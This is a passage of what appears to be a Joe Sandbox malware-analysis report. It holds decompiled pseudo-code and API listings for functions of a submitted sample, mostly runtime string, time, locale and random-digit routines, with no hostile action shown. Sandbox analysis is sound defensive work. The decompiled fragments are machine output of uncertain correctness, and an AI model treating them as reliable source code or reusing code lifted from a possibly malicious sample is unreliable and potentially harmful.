                                                                                						 *((short*)(_t32 + _t45 * 2)) = 0;
                                                                                					}
                                                                                				}
                                                                                				return _t43;
                                                                                			}
















                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040E40A
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040E429
                                                                                • _memmove.LIBCMT ref: 0040E46A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 3404309857-4289949731
                                                                                • Opcode ID: 0c4569b8437b5bd8d153c09ba8feecbf81866c5aea0c74ffe760e1a588978e32
                                                                                • Instruction ID: 1aa91c2beb56532d83383d4904f4eb6cc1e0bbbf6773aa533100211ada8fd7c5
                                                                                • Opcode Fuzzy Hash: 0c4569b8437b5bd8d153c09ba8feecbf81866c5aea0c74ffe760e1a588978e32
                                                                                • Instruction Fuzzy Hash: B811E2703002059FCB08EF6AD9C085973A5BF593147504A3EF816EB292D734E965CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040D270(void* __eax, signed int __ecx, intOrPtr* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t17;
                                                                                				void* _t18;
                                                                                				intOrPtr _t19;
                                                                                				intOrPtr* _t22;
                                                                                				intOrPtr* _t27;
                                                                                				void* _t28;
                                                                                				signed int _t29;
                                                                                				intOrPtr* _t33;
                                                                                				intOrPtr _t35;
                                                                                				intOrPtr* _t37;
                                                                                				void* _t38;
                                                                                
                                                                                				_t37 = __esi;
                                                                                				_t29 = __ecx;
                                                                                				_t28 = __eax;
                                                                                				_t17 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                				if(_t17 < _a8) {
                                                                                					_t17 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t18 = _t17 - _a8;
                                                                                				if(_t18 < _t28) {
                                                                                					_t28 = _t18;
                                                                                				}
                                                                                				_t19 =  *((intOrPtr*)(_t37 + 0x10));
                                                                                				if((_t29 | 0xffffffff) - _t19 <= _t28) {
                                                                                					_t19 = E0041D3B9("string too long");
                                                                                				}
                                                                                				if(_t28 != 0) {
                                                                                					_t35 = _t19 + _t28;
                                                                                					if(E00403CAC(_t28, _t37, _t35, _t38, _t35, 0) != 0) {
                                                                                						_t22 = _a4;
                                                                                						if( *((intOrPtr*)(_t22 + 0x14)) >= 0x10) {
                                                                                							_t22 =  *_t22;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                							_t33 = _t37;
                                                                                						} else {
                                                                                							_t33 =  *_t37;
                                                                                						}
                                                                                						E00421230( *((intOrPtr*)(_t37 + 0x10)) + _t33, _t22 + _a8, _t28);
                                                                                						 *((intOrPtr*)(_t37 + 0x10)) = _t35;
                                                                                						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                							_t27 = _t37;
                                                                                						} else {
                                                                                							_t27 =  *_t37;
                                                                                						}
                                                                                						 *((char*)(_t27 + _t35)) = 0;
                                                                                					}
                                                                                				}
                                                                                				return _t37;
                                                                                			}


















                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040D286
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040D2A5
                                                                                • _memmove.LIBCMT ref: 0040D2E2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 3404309857-4289949731
                                                                                • Opcode ID: 1521b5519d897088a0daef7712e8142c62f48b4b48fb5140800b2e8a8e419bd2
                                                                                • Instruction ID: 55d4c14f1ea96473c45b8c192cec8498876e449d4fdc252fff66dd7ee389584d
                                                                                • Opcode Fuzzy Hash: 1521b5519d897088a0daef7712e8142c62f48b4b48fb5140800b2e8a8e419bd2
                                                                                • Instruction Fuzzy Hash: B411BF31B002049FDB28DE9DC981A5AB3E4BF05704B10097EF453EB6C2D778E9488759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00418795(signed int __ecx, void* __edi, intOrPtr* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
                                                                                				void* __ebx;
                                                                                				intOrPtr _t11;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr* _t15;
                                                                                				intOrPtr* _t21;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr _t24;
                                                                                				signed int _t25;
                                                                                				intOrPtr* _t29;
                                                                                				void* _t35;
                                                                                				intOrPtr* _t36;
                                                                                				void* _t37;
                                                                                
                                                                                				_t37 = __ebp;
                                                                                				_t36 = __esi;
                                                                                				_t35 = __edi;
                                                                                				_t25 = __ecx;
                                                                                				_t23 =  *((intOrPtr*)(__esi + 0x10));
                                                                                				if(_t23 < __edi) {
                                                                                					E0041D406("invalid string position");
                                                                                				}
                                                                                				_t11 = _a4;
                                                                                				if((_t25 | 0xffffffff) - _t23 <= _t11) {
                                                                                					_t11 = E0041D3B9("string too long");
                                                                                				}
                                                                                				if(_t11 != 0) {
                                                                                					_t24 = _t23 + _t11;
                                                                                					if(E00403CAC(_t24, _t36, _t35, _t37, _t24, 0) != 0) {
                                                                                						_t14 =  *((intOrPtr*)(_t36 + 0x14));
                                                                                						if(_t14 < 0x10) {
                                                                                							_t29 = _t36;
                                                                                						} else {
                                                                                							_t29 =  *_t36;
                                                                                						}
                                                                                						if(_t14 < 0x10) {
                                                                                							_t15 = _t36;
                                                                                						} else {
                                                                                							_t15 =  *_t36;
                                                                                						}
                                                                                						E0041E250(_t15 + _t35 + _a4, _t29 + _t35,  *((intOrPtr*)(_t36 + 0x10)) - _t35);
                                                                                						E0040D305(_t36, _t35, _a8, _a4);
                                                                                						 *((intOrPtr*)(_t36 + 0x10)) = _t24;
                                                                                						if( *((intOrPtr*)(_t36 + 0x14)) < 0x10) {
                                                                                							_t21 = _t36;
                                                                                						} else {
                                                                                							_t21 =  *_t36;
                                                                                						}
                                                                                						 *((char*)(_t21 + _t24)) = 0;
                                                                                					}
                                                                                				}
                                                                                				return _t36;
                                                                                			}
















                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004187A2
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004187B9
                                                                                • _memmove.LIBCMT ref: 004187FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 3404309857-4289949731
                                                                                • Opcode ID: 189e12cbdc94e9b36475dd281bfb8c942a3c5ea965e9fe000976024ad75cbfaf
                                                                                • Instruction ID: c658fdf3f1b195c0b7b146226b1abb75349fff2c768c6e029754e5bae1fd61b9
                                                                                • Opcode Fuzzy Hash: 189e12cbdc94e9b36475dd281bfb8c942a3c5ea965e9fe000976024ad75cbfaf
                                                                                • Instruction Fuzzy Hash: AC1182307046405BD625AE6DCD91AABB7E6AF80704B64091EF4E2C77C2CB78D885C79E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 32%
                                                                                			E004161E0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int __fp0) {
                                                                                				void* _t29;
                                                                                				void* _t35;
                                                                                				void* _t37;
                                                                                				void* _t42;
                                                                                				signed int* _t43;
                                                                                				void* _t45;
                                                                                
                                                                                				_t45 = __eflags;
                                                                                				_t37 = __edx;
                                                                                				_t35 = __ecx;
                                                                                				E004219DE(E00436D86, __ebx, __edi, __esi);
                                                                                				 *(_t42 - 0x108) =  *(_t42 - 0x108) & 0x00000000;
                                                                                				 *(_t42 - 0x24) = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosw");
                                                                                				GetSystemTime(_t42 - 0x24);
                                                                                				GetTimeZoneInformation(_t42 - 0x104);
                                                                                				 *((short*)(_t42 - 0x34)) = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosw");
                                                                                				__imp__TzSpecificLocalTimeToSystemTime(_t42 - 0x104, _t42 - 0x24, _t42 - 0x34, 0xfc);
                                                                                				_push(_t35);
                                                                                				asm("fild dword [ebp-0x104]");
                                                                                				asm("fchs");
                                                                                				 *(_t42 - 0x108) = __fp0 /  *0x442ad0;
                                                                                				 *_t43 =  *(_t42 - 0x108);
                                                                                				_push(_t42 - 0x50);
                                                                                				_t29 = E0041763D(__ebx, _t37, _t42 - 0x32, __esi, _t45);
                                                                                				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                                                                                				E0040D3FA(_t35, __esi, "UTC", _t29);
                                                                                				E00402C34(_t42 - 0x50, 1, 0);
                                                                                				return E00421A61(__ebx, _t42 - 0x32, __esi);
                                                                                			}










                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004161EA
                                                                                • GetSystemTime.KERNEL32(00000001,000000FC,0040B192,00000001,00000000,00000001,00000000,00000001,00000000,?,?,?,00000000,00000001), ref: 00416208
                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000001), ref: 00416215
                                                                                • TzSpecificLocalTimeToSystemTime.KERNEL32(?,00000001,?,?,?,?,00000000,00000001), ref: 00416238
                                                                                  • Part of subcall function 0041763D: __EH_prolog3.LIBCMT ref: 00417647
                                                                                  • Part of subcall function 0041763D: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004176E8
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$System$H_prolog3H_prolog3_InformationIos_base_dtorLocalSpecificZone_memmovestd::ios_base::_
                                                                                • String ID: UTC
                                                                                • API String ID: 2104780860-2754919731
                                                                                • Opcode ID: 2b5c51dd0cb76299a83b3b73ba0e78ede8987fb0b161ca3235cabd309edd8f87
                                                                                • Instruction ID: 79ae3abbe5da33ca35b55944848f1912cf5119d12d142dfd83bc0a7e8e7fe170
                                                                                • Opcode Fuzzy Hash: 2b5c51dd0cb76299a83b3b73ba0e78ede8987fb0b161ca3235cabd309edd8f87
                                                                                • Instruction Fuzzy Hash: 9E115E71901618BFDB54DBE4DE49BCEB7B8AF18304F5004A6F244F6050DBB85E888B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 23%
                                                                                			E0042382C(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                				void* __ebp;
                                                                                				intOrPtr _t19;
                                                                                				void* _t21;
                                                                                				void* _t22;
                                                                                				void* _t24;
                                                                                				intOrPtr* _t25;
                                                                                				void* _t26;
                                                                                				void* _t27;
                                                                                
                                                                                				_t26 = __esi;
                                                                                				_t25 = __edi;
                                                                                				_t22 = __ecx;
                                                                                				_t21 = __ebx;
                                                                                				_t29 = _a20;
                                                                                				if(_a20 != 0) {
                                                                                					_push(_a20);
                                                                                					_push(__ebx);
                                                                                					_push(__esi);
                                                                                					_push(_a4);
                                                                                					E0042379A(__ebx, __edi, __esi, _t29);
                                                                                					_t27 = _t27 + 0x10;
                                                                                				}
                                                                                				_t30 = _a28;
                                                                                				_push(_a4);
                                                                                				if(_a28 != 0) {
                                                                                					_push(_a28);
                                                                                				} else {
                                                                                					_push(_t26);
                                                                                				}
                                                                                				E004215CA(_t22);
                                                                                				_push( *_t25);
                                                                                				_push(_a16);
                                                                                				_push(_a12);
                                                                                				_push(_t26);
                                                                                				E0042320B(_t21, _t24, _t25, _t26, _t30);
                                                                                				_push(0x100);
                                                                                				_push(_a24);
                                                                                				_t19 =  *((intOrPtr*)(_t25 + 4)) + 1;
                                                                                				_push(_a16);
                                                                                				 *((intOrPtr*)(_t26 + 8)) = _t19;
                                                                                				_push(_a8);
                                                                                				_push(_t26);
                                                                                				_push(_a4);
                                                                                				"j,hh=D"();
                                                                                				if(_t19 != 0) {
                                                                                					E00421591(_t19, _t26);
                                                                                					return _t19;
                                                                                				}
                                                                                				return _t19;
                                                                                			}












                                                                                APIs
                                                                                • ___BuildCatchObject.LIBCMT ref: 0042383F
                                                                                  • Part of subcall function 0042379A: ___BuildCatchObjectHelper.LIBCMT ref: 004237D0
                                                                                • _UnwindNestedFrames.LIBCMT ref: 00423856
                                                                                • ___FrameUnwindToState.LIBCMT ref: 00423864
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                • String ID: csm$csm
                                                                                • API String ID: 2163707966-3733052814
                                                                                • Opcode ID: 8b349ed66390314bf91fe942f820b866e1998406d2e9b45cbdcd93026cfd71a0
                                                                                • Instruction ID: 4b18216ae2ef9fac6165bc63aef4e8a25615c986ef91649751fd0c435c27fc7a
                                                                                • Opcode Fuzzy Hash: 8b349ed66390314bf91fe942f820b866e1998406d2e9b45cbdcd93026cfd71a0
                                                                                • Instruction Fuzzy Hash: 89012871100129BBCF126F51EC45EAA3FBAEF18359F40405AFD1918121D73ADAA1DBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E00419390(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t34;
                                                                                				intOrPtr* _t38;
                                                                                				intOrPtr _t40;
                                                                                				void* _t41;
                                                                                				void* _t42;
                                                                                
                                                                                				_t42 = __eflags;
                                                                                				_push(4);
                                                                                				E004219A8(E00435B25, __ebx, __edi, __esi);
                                                                                				_t40 =  *((intOrPtr*)(_t41 + 8));
                                                                                				_t38 = E00420F19(__ebx, _t40, _t42);
                                                                                				 *((intOrPtr*)(_t40 + 8)) = 0;
                                                                                				 *((intOrPtr*)(_t40 + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t40 + 0x14)) = 0;
                                                                                				 *((intOrPtr*)(_t41 - 4)) = 0;
                                                                                				E0041DDAE();
                                                                                				 *((intOrPtr*)(_t40 + 8)) = E00419445(0x43e028);
                                                                                				E0041DDAE();
                                                                                				 *((intOrPtr*)(_t40 + 0x10)) = E00419445("false");
                                                                                				E0041DDAE();
                                                                                				 *((intOrPtr*)(_t40 + 0x14)) = E00419445("true");
                                                                                				E0041DDAE();
                                                                                				 *((char*)(_t40 + 0xc)) =  *((intOrPtr*)( *_t38));
                                                                                				E0041DDAE();
                                                                                				 *((char*)(_t40 + 0xd)) =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 4))));
                                                                                				E0041DDAE();
                                                                                				 *((char*)(_t40 + 0xc)) = 0x2e;
                                                                                				_t34 = E0041DDAE();
                                                                                				 *((char*)(_t40 + 0xd)) = 0x2c;
                                                                                				return E00421A4D(_t34);
                                                                                			}









                                                                                APIs
                                                                                • __EH_prolog3_catch.LIBCMT ref: 00419397
                                                                                • _localeconv.LIBCMT ref: 0041939F
                                                                                  • Part of subcall function 00420F19: __getptd.LIBCMT ref: 00420F19
                                                                                  • Part of subcall function 0041DDAE: ____lc_handle_func.LIBCMT ref: 0041DDB1
                                                                                  • Part of subcall function 0041DDAE: ____lc_codepage_func.LIBCMT ref: 0041DDB9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_catch____lc_codepage_func____lc_handle_func__getptd_localeconv
                                                                                • String ID: (C$false$true
                                                                                • API String ID: 2930029256-1123413311
                                                                                • Opcode ID: a0c01fab142c24493b514f8d9614e3c289579df7f84627c123770faac48ee8f9
                                                                                • Instruction ID: 753a31a21249a0a8cf25c30170d939246f296a6dd162e783afc48056f5a63359
                                                                                • Opcode Fuzzy Hash: a0c01fab142c24493b514f8d9614e3c289579df7f84627c123770faac48ee8f9
                                                                                • Instruction Fuzzy Hash: B801E1B4E157408EC760FF7A9005249BBE06F95308B04C96FE1998B753DB7CE584CB6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E00417319(void* __eax, void* __eflags) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t11;
                                                                                				void* _t14;
                                                                                				signed int _t17;
                                                                                				void* _t18;
                                                                                				void* _t20;
                                                                                				void* _t21;
                                                                                				CHAR* _t22;
                                                                                				void* _t23;
                                                                                
                                                                                				_t20 = __eax;
                                                                                				_t22 = E0041E042(_t18, __eax, _t21, __eax);
                                                                                				 *_t22 = 0;
                                                                                				E0041F58A(GetTickCount());
                                                                                				_t14 = 0;
                                                                                				_t25 = _t20;
                                                                                				if(_t20 > 0) {
                                                                                					_t14 = _t20;
                                                                                					do {
                                                                                						_t11 = E0041F59C(_t25);
                                                                                						_t17 = 0xa;
                                                                                						asm("cdq");
                                                                                						wsprintfA(_t22, "%s%d", _t22, _t11 % _t17);
                                                                                						_t23 = _t23 + 0x10;
                                                                                						_t20 = _t20 - 1;
                                                                                					} while (_t20 != 0);
                                                                                				}
                                                                                				 *((char*)(_t14 + _t22)) = 0;
                                                                                				return _t22;
                                                                                			}














                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 0041731F
                                                                                  • Part of subcall function 0041E042: __FF_MSGBANNER.LIBCMT ref: 0041E05B
                                                                                  • Part of subcall function 0041E042: __NMSG_WRITE.LIBCMT ref: 0041E062
                                                                                  • Part of subcall function 0041E042: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00402F66,00000010), ref: 0041E087
                                                                                • GetTickCount.KERNEL32 ref: 0041732A
                                                                                  • Part of subcall function 0041F58A: __getptd.LIBCMT ref: 0041F58F
                                                                                • _rand.LIBCMT ref: 0041733F
                                                                                  • Part of subcall function 0041F59C: __getptd.LIBCMT ref: 0041F59C
                                                                                • wsprintfA.USER32 ref: 00417352
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
                                                                                • String ID: %s%d
                                                                                • API String ID: 2840978672-1110647743
                                                                                • Opcode ID: 7c5257040d14f007887309139704f93e4cf48fbfb5f3b41ac1871a356a95beb8
                                                                                • Instruction ID: 9f988e68ebd4aa8a26a65c89bd4f648a6c9477fe81a95545e8e146a011f54420
                                                                                • Opcode Fuzzy Hash: 7c5257040d14f007887309139704f93e4cf48fbfb5f3b41ac1871a356a95beb8
                                                                                • Instruction Fuzzy Hash: 23E02B323456503AE3252BAE5C49BBB9E69DFC6765F24006FF944C6283DDEC4C8142B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00C716B7
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 00C716D4
                                                                                  • Part of subcall function 00C71629: std::runtime_error::runtime_error.LIBCPMTD ref: 00C71634
                                                                                • __CxxThrowException@8.LIBCMT ref: 00C716E2
                                                                                  • Part of subcall function 00C733AB: RaiseException.KERNEL32(?,?,00C7316D,00C71293,?,?,?,?,00C7316D,00C71293,00DAB120,00DAD428,00C71293,00000000,00000000), ref: 00C733ED
                                                                                • std::runtime_error::runtime_error.LIBCPMTD ref: 00C716F3
                                                                                  • Part of subcall function 00C63D70: std::exception::exception.LIBCMT ref: 00C63D9D
                                                                                Strings
                                                                                • invalid string position, xrefs: 00C716BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: std::runtime_error::runtime_error$ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID: invalid string position
                                                                                • API String ID: 4027220959-1799206989
                                                                                • Opcode ID: 3242aee3339f8e56ff74d93fa398ecdc6fd10b2dac0cfcc0411992ae57bfbb82
                                                                                • Instruction ID: c19281194a31d43fcf3f8a2a16e27ee741ecf59c9452c8ccdd13b65ce937eb20
                                                                                • Opcode Fuzzy Hash: 3242aee3339f8e56ff74d93fa398ecdc6fd10b2dac0cfcc0411992ae57bfbb82
                                                                                • Instruction Fuzzy Hash: 0FF09B7660025C67CB20EBD4DC86EDEB77CEF44761F184425F604A7541DFB19A04E7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 00C7BD2D
                                                                                  • Part of subcall function 00C771DA: __getptd_noexit.LIBCMT ref: 00C771DD
                                                                                  • Part of subcall function 00C771DA: __amsg_exit.LIBCMT ref: 00C771EA
                                                                                • __getptd.LIBCMT ref: 00C7BD3E
                                                                                • __getptd.LIBCMT ref: 00C7BD4C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                • String ID: MOC$csm
                                                                                • API String ID: 803148776-1389381023
                                                                                • Opcode ID: d5b26452f1acb593a333f25b930e2cfa0d182143386c67c8b284165417fe066f
                                                                                • Instruction ID: 7f8a87741151b5778b6f0dee6e4e18001c7857d1529d8b25d05a9c0d165c3ea4
                                                                                • Opcode Fuzzy Hash: d5b26452f1acb593a333f25b930e2cfa0d182143386c67c8b284165417fe066f
                                                                                • Instruction Fuzzy Hash: 77E04F351041088FDF20EB68C14BB283794EF98314F5586A1E80CC7323E734DD40AA52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E0040D762(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t141;
                                                                                				intOrPtr _t145;
                                                                                				void* _t164;
                                                                                				void* _t171;
                                                                                				void* _t176;
                                                                                				WCHAR* _t177;
                                                                                				signed char _t178;
                                                                                				void* _t184;
                                                                                				CHAR* _t185;
                                                                                				void* _t191;
                                                                                				void* _t198;
                                                                                				void* _t208;
                                                                                				WCHAR* _t209;
                                                                                				intOrPtr _t235;
                                                                                				intOrPtr _t281;
                                                                                				intOrPtr _t286;
                                                                                				WCHAR* _t293;
                                                                                				void* _t303;
                                                                                				void* _t304;
                                                                                				intOrPtr _t305;
                                                                                				intOrPtr _t313;
                                                                                
                                                                                				_t285 = __esi;
                                                                                				_t273 = __edi;
                                                                                				_t224 = __ebx;
                                                                                				_push(0x200);
                                                                                				E004219DE(E00437044, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t303 - 0x1f8)) =  *((intOrPtr*)(_t303 + 8));
                                                                                				 *((intOrPtr*)(_t303 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t303 - 0x18)) = 0xf;
                                                                                				 *((intOrPtr*)(_t303 - 0x1c)) = 0;
                                                                                				 *((char*)(_t303 - 0x2c)) = 0;
                                                                                				 *((char*)(_t303 - 4)) = 3;
                                                                                				_t307 =  *((intOrPtr*)(_t303 + 0xc));
                                                                                				if( *((intOrPtr*)(_t303 + 0xc)) == 0) {
                                                                                					_push( *0x449ea8);
                                                                                				} else {
                                                                                					_push( *0x449e58);
                                                                                				}
                                                                                				E0040381A(_t303 - 0x2c, E0041F644(_t224, _t273, _t285, _t307));
